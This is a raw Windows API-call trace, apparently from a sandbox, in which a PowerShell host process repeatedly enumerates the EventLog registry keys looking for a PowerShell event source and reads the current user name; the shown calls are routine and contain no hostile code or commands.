	[0203.592] CoTaskMemFree (pv=0x1b853650) 
	[0203.593] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0203.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.593] CoTaskMemFree (pv=0x190070) 
	[0204.080] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0204.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.080] CoTaskMemFree (pv=0x190070) 
	[0204.085] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d138 | out: phkResult=0x27d138*=0x1cc) returned 0x0
	[0204.089] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.089] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x0, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x1, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x2, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x3, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x4, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.090] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.090] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x5, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.090] CoTaskMemFree (pv=0xe5880) 
	[0204.090] CoTaskMemFree (pv=0x0) 
	[0204.091] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.091] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x6, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.091] CoTaskMemFree (pv=0xe5880) 
	[0204.091] CoTaskMemFree (pv=0x0) 
	[0204.091] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.091] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x7, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.091] CoTaskMemFree (pv=0xe5880) 
	[0204.091] CoTaskMemFree (pv=0x0) 
	[0204.091] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.091] RegEnumKeyExW (in: hKey=0x1cc, dwIndex=0x8, lpName=0xe5880, lpcchName=0x27d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x27d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.091] CoTaskMemFree (pv=0xe5880) 
	[0204.091] CoTaskMemFree (pv=0x0) 
	[0204.091] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x30c) returned 0x0
	[0204.091] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.091] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x320) returned 0x0
	[0204.091] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.091] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x32c) returned 0x0
	[0204.091] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.091] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x330) returned 0x0
	[0204.091] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.092] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x334) returned 0x0
	[0204.092] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.092] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x338) returned 0x0
	[0204.092] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.092] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x5
	[0204.107] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x33c) returned 0x0
	[0204.107] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x0) returned 0x2
	[0204.107] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x340) returned 0x0
	[0204.107] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d198 | out: phkResult=0x27d198*=0x344) returned 0x0
	[0204.107] RegCloseKey (hKey=0x344) returned 0x0
	[0204.107] RegCloseKey (hKey=0x1cc) returned 0x0
	[0204.108] RegCloseKey (hKey=0x340) returned 0x0
	[0204.653] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0204.653] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d3a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d3a8) returned 0x1
	[0204.654] CoTaskMemFree (pv=0x1b86daf0) 
	[0204.655] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0204.655] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d3e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d3e8) returned 1
	[0204.656] CoTaskMemFree (pv=0xe5880) 
	[0209.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d0e8 | out: phkResult=0x27d0e8*=0x348) returned 0x0
	[0209.753] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.753] CoTaskMemFree (pv=0x0) 
	[0209.753] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.753] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.753] CoTaskMemFree (pv=0xe5880) 
	[0209.753] CoTaskMemFree (pv=0x0) 
	[0209.753] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.753] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.753] CoTaskMemFree (pv=0xe5880) 
	[0209.753] CoTaskMemFree (pv=0x0) 
	[0209.753] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.753] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.753] CoTaskMemFree (pv=0xe5880) 
	[0209.753] CoTaskMemFree (pv=0x0) 
	[0209.753] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.753] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.753] CoTaskMemFree (pv=0xe5880) 
	[0209.753] CoTaskMemFree (pv=0x0) 
	[0209.753] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.754] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.754] CoTaskMemFree (pv=0xe5880) 
	[0209.754] CoTaskMemFree (pv=0x0) 
	[0209.754] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.754] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.754] CoTaskMemFree (pv=0xe5880) 
	[0209.754] CoTaskMemFree (pv=0x0) 
	[0209.754] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.754] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.754] CoTaskMemFree (pv=0xe5880) 
	[0209.754] CoTaskMemFree (pv=0x0) 
	[0209.754] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.754] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.754] CoTaskMemFree (pv=0xe5880) 
	[0209.754] CoTaskMemFree (pv=0x0) 
	[0209.754] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.754] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.754] CoTaskMemFree (pv=0xe5880) 
	[0209.754] CoTaskMemFree (pv=0x0) 
	[0209.754] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x34c) returned 0x0
	[0209.754] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.754] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x350) returned 0x0
	[0209.754] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.754] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x354) returned 0x0
	[0209.755] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.755] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x358) returned 0x0
	[0209.755] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.755] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x35c) returned 0x0
	[0209.755] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.755] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x360) returned 0x0
	[0209.755] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.755] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x5
	[0209.766] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x364) returned 0x0
	[0209.766] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.766] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x368) returned 0x0
	[0209.766] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x36c) returned 0x0
	[0209.766] RegCloseKey (hKey=0x36c) returned 0x0
	[0209.766] RegCloseKey (hKey=0x348) returned 0x0
	[0209.766] RegCloseKey (hKey=0x368) returned 0x0
	[0209.767] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d0e8 | out: phkResult=0x27d0e8*=0x368) returned 0x0
	[0209.767] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.767] CoTaskMemFree (pv=0x0) 
	[0209.767] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.767] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.767] CoTaskMemFree (pv=0xe5880) 
	[0209.767] CoTaskMemFree (pv=0x0) 
	[0209.767] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.767] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.767] CoTaskMemFree (pv=0xe5880) 
	[0209.767] CoTaskMemFree (pv=0x0) 
	[0209.767] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.767] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0209.768] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0xe5880, lpcchName=0x27d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x27d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0209.768] CoTaskMemFree (pv=0xe5880) 
	[0209.768] CoTaskMemFree (pv=0x0) 
	[0209.768] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x348) returned 0x0
	[0209.768] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.769] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x36c) returned 0x0
	[0209.769] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.769] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x370) returned 0x0
	[0209.769] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.769] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x374) returned 0x0
	[0209.769] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.787] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x360) returned 0x0
	[0209.787] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.787] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x364) returned 0x0
	[0209.787] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0209.787] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x5
	[0210.349] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x374) returned 0x0
	[0210.349] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x0) returned 0x2
	[0210.349] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x348) returned 0x0
	[0210.349] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d148 | out: phkResult=0x27d148*=0x2e4) returned 0x0
	[0210.349] RegCloseKey (hKey=0x2e4) returned 0x0
	[0210.349] RegCloseKey (hKey=0x368) returned 0x0
	[0210.350] RegCloseKey (hKey=0x348) returned 0x0
	[0210.351] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d0b8 | out: phkResult=0x27d0b8*=0x348) returned 0x0
